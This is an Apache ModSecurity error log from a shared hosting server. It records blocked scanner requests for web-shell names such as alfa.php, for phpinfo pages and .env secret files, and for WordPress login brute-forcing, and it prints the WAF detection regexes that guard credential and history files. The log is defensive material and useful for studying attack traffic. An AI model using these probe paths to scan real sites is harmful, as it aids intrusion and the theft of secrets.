[Tue May 26 13:18:39.335027 2026] [security2:error] [pid 501489:tid 501625] [client 4.201.75.230:2332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/tmp.php"] [unique_id "ahVQV2kFNZ9cRlz80IjbeAAAAIs"]
[Tue May 26 13:18:39.792593 2026] [security2:error] [pid 501489:tid 501630] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQV2kFNZ9cRlz80IjbgAAAAJA"]
[Tue May 26 13:18:41.663313 2026] [security2:error] [pid 501489:tid 501705] [client 4.201.75.230:2320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-admin/a.php"] [unique_id "ahVQWWkFNZ9cRlz80IjbwQAAANo"]
[Tue May 26 13:18:42.138795 2026] [security2:error] [pid 501489:tid 501749] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQWWkFNZ9cRlz80IjbxgAAAQI"]
[Tue May 26 13:18:43.227999 2026] [security2:error] [pid 501489:tid 501743] [client 74.7.244.29:45108] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.pronumbers.com.au"] [uri "/cgi-sys/404.html"] [unique_id "ahVQW2kFNZ9cRlz80Ijb8wAA_FY"]
[Tue May 26 13:18:44.037262 2026] [security2:error] [pid 501489:tid 501648] [client 114.119.144.36:52381] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/robots.txt"] [unique_id "ahVQXGkFNZ9cRlz80IjcBQAAAKE"]
[Tue May 26 13:18:44.694813 2026] [security2:error] [pid 501489:tid 501738] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQXGkFNZ9cRlz80IjcEAAAAPc"]
[Tue May 26 13:18:45.321661 2026] [security2:error] [pid 501489:tid 501652] [client 4.201.75.230:2359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-admin/alfa.php"] [unique_id "ahVQXWkFNZ9cRlz80IjcKAAAAKU"]
[Tue May 26 13:18:45.498977 2026] [security2:error] [pid 501489:tid 501674] [client 85.11.167.49:64516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/phpinfo.php"] [unique_id "ahVQXWkFNZ9cRlz80IjcKQAAALs"]
[Tue May 26 13:18:45.753773 2026] [security2:error] [pid 501489:tid 501700] [client 85.11.167.49:64647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/test.php"] [unique_id "ahVQXWkFNZ9cRlz80IjcNwAAANU"]
[Tue May 26 13:18:46.148068 2026] [security2:error] [pid 501489:tid 501662] [client 85.11.167.49:64760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/info.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcPwAAAK8"]
[Tue May 26 13:18:46.404635 2026] [security2:error] [pid 501489:tid 501625] [client 85.11.167.49:64961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/php.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcTAAAAIs"]
[Tue May 26 13:18:46.663061 2026] [security2:error] [pid 501489:tid 501727] [client 85.11.167.49:65060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/php_info.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcVQAAAO4"]
[Tue May 26 13:18:46.926125 2026] [security2:error] [pid 501489:tid 501739] [client 85.11.167.49:65154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/i.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcXwAAAPg"]
[Tue May 26 13:18:47.183577 2026] [security2:error] [pid 501489:tid 501675] [client 85.11.167.49:65222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/pi.php"] [unique_id "ahVQX2kFNZ9cRlz80IjcZwAAALw"]
[Tue May 26 13:18:47.229682 2026] [security2:error] [pid 501489:tid 501738] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQXmkFNZ9cRlz80IjcWwAAAPc"]
[Tue May 26 13:18:47.593083 2026] [security2:error] [pid 501489:tid 501629] [client 85.11.167.49:65299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/admin/phpinfo.php"] [unique_id "ahVQX2kFNZ9cRlz80IjcdQAAAI8"]
[Tue May 26 13:18:47.851664 2026] [security2:error] [pid 501489:tid 501718] [client 85.11.167.49:65424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/pinfo.php"] [unique_id "ahVQX2kFNZ9cRlz80IjcfgAAAOc"]
[Tue May 26 13:18:48.109007 2026] [security2:error] [pid 501489:tid 501680] [client 85.11.167.49:65495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/php_version.php"] [unique_id "ahVQYGkFNZ9cRlz80IjchAAAAME"]
[Tue May 26 13:18:48.500689 2026] [security2:error] [pid 501489:tid 501667] [client 85.11.167.49:49175] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVQYGkFNZ9cRlz80IjclwAAALQ"]
[Tue May 26 13:18:48.903211 2026] [security2:error] [pid 501489:tid 501671] [client 85.11.167.49:49175] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/.env.backup"] [unique_id "ahVQYGkFNZ9cRlz80IjcqwAAALg"]
[Tue May 26 13:18:49.033473 2026] [security2:error] [pid 501489:tid 501741] [client 85.11.167.49:49175] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/config/.env"] [unique_id "ahVQYWkFNZ9cRlz80IjcrwAAAPo"]
[Tue May 26 13:18:52.050035 2026] [security2:error] [pid 501489:tid 501728] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQY2kFNZ9cRlz80Ijc8wAAAO8"]
[Tue May 26 13:18:53.199025 2026] [security2:error] [pid 501489:tid 501622] [client 4.201.75.230:2340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-admin/network/index.php"] [unique_id "ahVQZWkFNZ9cRlz80IjdJwAAAIg"]
[Tue May 26 13:18:53.497452 2026] [security2:error] [pid 501489:tid 501707] [client 193.19.109.28:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVQZGkFNZ9cRlz80IjdFAAA3Gs"]
[Tue May 26 13:18:54.720480 2026] [security2:error] [pid 501489:tid 501608] [remote 74.7.241.58:51600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVQZmkFNZ9cRlz80IjdVwAAtXY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:18:55.088603 2026] [security2:error] [pid 501489:tid 501689] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQZmkFNZ9cRlz80IjdUwAAAMo"]
[Tue May 26 13:18:55.198202 2026] [security2:error] [pid 501489:tid 501742] [client 4.201.75.230:2318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVQZ2kFNZ9cRlz80IjdYAAAAPs"]
[Tue May 26 13:18:56.267254 2026] [security2:error] [pid 501489:tid 501694] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQZ2kFNZ9cRlz80IjdeQAAAM8"]
[Tue May 26 13:18:58.223864 2026] [security2:error] [pid 501489:tid 501650] [client 85.208.96.203:46796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVQamkFNZ9cRlz80IjdwgAAAKM"]
[Tue May 26 13:18:58.223960 2026] [security2:error] [pid 501489:tid 501650] [client 85.208.96.203:46796] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVQamkFNZ9cRlz80IjdwgAAAKM"]
[Tue May 26 13:18:58.536935 2026] [security2:error] [pid 501489:tid 501658] [client 4.201.75.230:2334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-includes/IXR/test1.php"] [unique_id "ahVQamkFNZ9cRlz80IjdzAAAAKs"]
[Tue May 26 13:18:58.538112 2026] [security2:error] [pid 501489:tid 501680] [client 145.239.10.137:53101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/Masks.php"] [unique_id "ahVQamkFNZ9cRlz80IjdzQAAAME"], referer: http://glorodavionics.com/Masks.php
[Tue May 26 13:18:59.265605 2026] [security2:error] [pid 501489:tid 501714] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQamkFNZ9cRlz80Ijd1wAAAOM"]
[Tue May 26 13:19:00.046515 2026] [security2:error] [pid 501489:tid 501666] [client 172.98.32.42:25311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVQa2kFNZ9cRlz80Ijd-gAAALM"]
[Tue May 26 13:19:00.822941 2026] [security2:error] [pid 501489:tid 501632] [client 145.239.10.137:60930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodbalsa.com"] [uri "/Masks.php"] [unique_id "ahVQbGkFNZ9cRlz80IjeFwAAAJI"], referer: http://glorodbalsa.com/Masks.php
[Tue May 26 13:19:01.830206 2026] [security2:error] [pid 501489:tid 501623] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQbWkFNZ9cRlz80IjeKgAAAIk"]
[Tue May 26 13:19:02.992910 2026] [security2:error] [pid 501489:tid 501630] [client 104.238.32.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVQbmkFNZ9cRlz80IjeRwAAAJA"]
[Tue May 26 13:19:03.576565 2026] [security2:error] [pid 501489:tid 501718] [client 123.21.181.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQb2kFNZ9cRlz80IjeWQAAAOc"]
[Tue May 26 13:19:03.593880 2026] [security2:error] [pid 501489:tid 501696] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQb2kFNZ9cRlz80IjeXwAAANE"]
[Tue May 26 13:19:06.556511 2026] [security2:error] [pid 501489:tid 501720] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQcmkFNZ9cRlz80IjesQAAAOk"]
[Tue May 26 13:19:08.371321 2026] [security2:error] [pid 501489:tid 501748] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQc2kFNZ9cRlz80Ije5wAAAQE"]
[Tue May 26 13:19:10.834655 2026] [security2:error] [pid 501489:tid 501675] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQdmkFNZ9cRlz80IjfJQAAALw"]
[Tue May 26 13:19:11.340126 2026] [security2:error] [pid 501489:tid 501537] [remote 216.73.217.110:35630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahVQd2kFNZ9cRlz80IjfOAAAsi8"]
[Tue May 26 13:19:13.653291 2026] [security2:error] [pid 501489:tid 501731] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQeWkFNZ9cRlz80IjfZgAAAPE"]
[Tue May 26 13:19:14.769063 2026] [security2:error] [pid 501489:tid 501654] [client 66.249.64.42:39841] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQeWkFNZ9cRlz80IjfcgAAAKc"], referer: https://mosykay.com/prizes/270115379
[Tue May 26 13:19:16.151046 2026] [security2:error] [pid 501489:tid 501735] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQe2kFNZ9cRlz80IjfogAAAPU"]
[Tue May 26 13:19:16.740231 2026] [autoindex:error] [pid 501489:tid 501641] [client 119.28.122.202:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:19:17.690845 2026] [security2:error] [pid 501489:tid 501674] [client 85.208.96.210:59964] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVQfWkFNZ9cRlz80Ijf0wAAALs"]
[Tue May 26 13:19:17.690946 2026] [security2:error] [pid 501489:tid 501674] [client 85.208.96.210:59964] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVQfWkFNZ9cRlz80Ijf0wAAALs"]
[Tue May 26 13:19:18.631707 2026] [security2:error] [pid 501489:tid 501659] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQfmkFNZ9cRlz80Ijf3wAAAKw"]
[Tue May 26 13:19:20.380952 2026] [security2:error] [pid 501489:tid 501671] [client 74.249.173.207:4436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wk/index.php"] [unique_id "ahVQgGkFNZ9cRlz80IjgJAAAALg"]
[Tue May 26 13:19:20.891127 2026] [security2:error] [pid 501489:tid 501728] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQgGkFNZ9cRlz80IjgMAAAAO8"]
[Tue May 26 13:19:21.089572 2026] [security2:error] [pid 501489:tid 501683] [client 51.68.111.205:26649] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclubmembership.com"] [uri "/robots.txt"] [unique_id "ahVQgWkFNZ9cRlz80IjgQwAAAMQ"]
[Tue May 26 13:19:21.089692 2026] [security2:error] [pid 501489:tid 501683] [client 51.68.111.205:26649] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "kingsclubmembership.com"] [uri "/robots.txt"] [unique_id "ahVQgWkFNZ9cRlz80IjgQwAAAMQ"]
[Tue May 26 13:19:21.909287 2026] [security2:error] [pid 501489:tid 501714] [client 74.249.173.207:4440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/inputs.php"] [unique_id "ahVQgWkFNZ9cRlz80IjgUQAAAOM"]
[Tue May 26 13:19:22.539192 2026] [security2:error] [pid 501489:tid 501568] [remote 121.200.216.55:45272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVQgmkFNZ9cRlz80IjgWQAAkE4"]
[Tue May 26 13:19:22.785192 2026] [security2:error] [pid 501489:tid 501639] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQgmkFNZ9cRlz80IjgXAAAAJk"]
